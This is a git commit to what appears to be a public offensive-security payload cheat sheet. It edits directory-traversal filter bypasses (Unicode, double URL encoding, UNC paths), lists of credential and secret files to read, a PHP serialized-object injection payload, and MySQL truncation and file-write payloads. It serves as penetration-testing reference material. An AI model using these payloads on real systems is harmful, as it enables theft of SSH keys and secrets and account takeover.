Fix typo in PHP Object injection

This commit is contained in:
Swissky 2019-07-05 18:42:42 +02:00
parent 13ba72f124
commit f6564869f0
3 changed files with 36 additions and 15 deletions

View file

@ -6,7 +6,14 @@
* [Tools](#tools)
* [Basic exploitation](#basic-exploitation)
* [16 bits Unicode encoding](#)
* [UTF-8 Unicode encoding](#)
* [Bypass "../" replaced by ""](#)
* [Double URL encoding](#)
* [UNC Bypass](#unc-bypass)
* [Path Traversal](#path-traversal)
* [Interesting Linux files](#)
* [Interesting Windows files](#)
## Tools
@ -31,7 +38,7 @@ We can use the `..` characters to access the parent directory, the following str
%uff0e%uff0e%u2216
```
16 bit Unicode encoding
### 16 bits Unicode encoding
```powershell
. = %u002e
@ -39,7 +46,7 @@ We can use the `..` characters to access the parent directory, the following str
\ = %u2216
```
UTF-8 Unicode encoding
### UTF-8 Unicode encoding
```powershell
. = %c0%2e, %e0%40%ae, %c0ae
@ -47,6 +54,7 @@ UTF-8 Unicode encoding
\ = %c0%5c, %c0%80%5c
```
### Bypass "../" replaced by ""
Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.
```powershell
@ -54,7 +62,7 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
...\.\
```
Double URL encoding
### Double URL encoding
```powershell
. = %252e
@ -62,10 +70,18 @@ Double URL encoding
\ = %255c
```
### UNC Bypass
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
```powershell
\\localhost\c$\windows\win.ini
```
## Path Traversal
Linux - Interesting files to check out :
### Interesting Linux files
```powershell
/etc/issue
@ -85,9 +101,16 @@ Linux - Interesting files to check out :
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/var/run/secrets/kubernetes.io/serviceaccount
```
Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
### Interesting Windows files
Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
```powershell
c:/boot.ini
@ -127,15 +150,7 @@ The following log files are controllable and can be included with an evil payloa
/var/log/mail
```
Other easy win files.
```powershell
/proc/self/cwd/index.php
/home/$USER/.bash_history
/var/run/secrets/kubernetes.io/serviceaccount
```
## References
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)

View file

@ -99,7 +99,7 @@ if($obj) {
Payload:
```php
O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
```
## Others exploits

View file

@ -263,6 +263,12 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo
In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
```sql
`username` varchar(20) not null
```
Payload: `username = "admin a"`
## MYSQL UDF command execution
First you need to check if the UDF are installed on the server.